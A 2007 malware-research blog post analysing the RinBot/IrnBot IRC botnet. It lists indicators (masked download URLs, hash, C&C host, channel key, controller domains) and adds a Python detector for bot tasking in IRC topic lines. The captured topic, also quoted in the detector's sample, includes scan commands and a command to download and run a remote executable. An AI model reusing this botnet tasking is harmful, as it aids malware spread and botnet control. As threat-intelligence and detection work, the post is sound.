Wednesday, March 07, 2007

IrnBot enjoys the attention from Offensive Computing.

OffensiveComputing is a community of anti-malware experts from all parts of the world.

They posted a blog entry about the recent RinBot, aka Irnbot, aka VanBot.

Judging from the disassembly, the author wants his bot called 'IrnBot'...

The author seems to enjoy the attention his bot is attracting. 'Im-a-drone'...err, Irnbot has made references to Symantec, CNN, and now our friends over at Offensive Computing. Each time he's mentioned, he uses the newfound fame in the next bot code update. The last time I saw something this entertaining was back when Witlog was running.

http://58.xx.xxx.39/asm.exe (66a92827c333cb1d43762f33535a6d61)

IRC Based C&C at: x.anti-viral.us:8080

Uses nickname format: [XP|USA|P|00|jibberish]
User connect string: XP-USA 0 0 :[XP|USA|P|00|jibberish]

Channel: ##OC
Key: hellovalsmit

:s013.xnet.net 332 [XP|USA|P|00|] ##OC :.scan.stop
-s;.scan.start N 30 -s;.scan.start N 30 -a -s;.scan.start N x.x.x.x 30
-s;.scan.start M 15 -a -s;.scan.start M 15 -s;.scan.start M x.x.x.x 15
-s;.scan.start S 15 -a -s;.scan.start S 15 -s;.scan.start S x.x.x.x 15
-s;.download Off3ns1v3C0mputingD0wnload http://210.xx.xx.118/MS.exe
c:\m.exe -e -s
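
As an added illustration (not code from the original post or from the bot), here is a small detection helper that flags IRC RPL_TOPIC (numeric 332) lines carrying this kind of ';'-separated bot tasking, or a nick in the [XP|USA|P|00|...] format. The sample lines are constructed from the topic above (IPs masked as on the page, list abridged), and the regexes are my assumptions about the format.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Nick format the bot uses (from the post): [XP|USA|P|00|jibberish]; the trailing part may be empty
NICK_RE = re.compile(r"^\[[A-Z0-9]+\|[A-Z]{2,3}\|[A-Z]\|\d{2}\|[^\]]*\]$")
# IRC RPL_TOPIC numeric 332: ":<server> 332 <nick> <channel> :<topic text>"
TOPIC_RE = re.compile(r"^:(?P<server>\S+) 332 (?P<nick>\S+) (?P<chan>\S+) :(?P<topic>.*)$")
URL_RE = re.compile(r"https?://\S+")

@dataclass
class TopicAlert:
    channel: str
    nick: str
    nick_matches_bot: bool
    commands: List[str]   # '.'-prefixed bot commands found in the topic
    urls: List[str]       # download URLs referenced by the topic

def split_commands(topic: str) -> List[str]:
    """The bot reads its tasking from the channel topic as ';'-separated '.command' entries."""
    return [c.strip() for c in topic.split(";") if c.strip().startswith(".")]

def inspect_line(line: str) -> Optional[TopicAlert]:
    """Return an alert for a 332 line whose nick or topic looks like bot tasking, else None."""
    m = TOPIC_RE.match(line.strip())
    if m is None:
        return None
    cmds = split_commands(m["topic"])
    nick_hit = NICK_RE.match(m["nick"]) is not None
    if not (nick_hit or cmds):
        return None
    return TopicAlert(m["chan"], m["nick"], nick_hit, cmds, URL_RE.findall(m["topic"]))

def scan(lines) -> List[TopicAlert]:
    """Run inspect_line over captured IRC lines and keep only the hits."""
    return [a for a in (inspect_line(l) for l in lines) if a is not None]

# Constructed sample: the post's topic line rejoined on one line (abridged), plus a benign
# topic that must not alert.
SAMPLE_LINES = [
    ":s013.xnet.net 332 [XP|USA|P|00|] ##OC :.scan.stop -s;.scan.start N 30 -s;"
    ".scan.start M 15 -a -s;.download Off3ns1v3C0mputingD0wnload "
    "http://210.xx.xx.118/MS.exe c:\\m.exe -e -s",
    ":irc.example.net 332 alice #chat :Welcome, be nice; rules at http://example.net/rules",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LINES):
        print(alert)
```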
The MS.exe file is his 'spammer' application, which connects to http://66.xxx.xxx.9/x/getConfig.php to launch a spam run.

His current spam topic is: Analysis: Verdict puts focus on Cheney

Note the channel key: hellovalsmit, or "Hello Val Smith". Val Smith is the CTO of Offensive Computing.

This guy appears to own or control these domains:

x.anti-viral.us
is.wayne.brady.gonna.have.to.chokeabitch.us
x.rofflewaffles.us
mx.sbn01.to
ircd.myadv.biz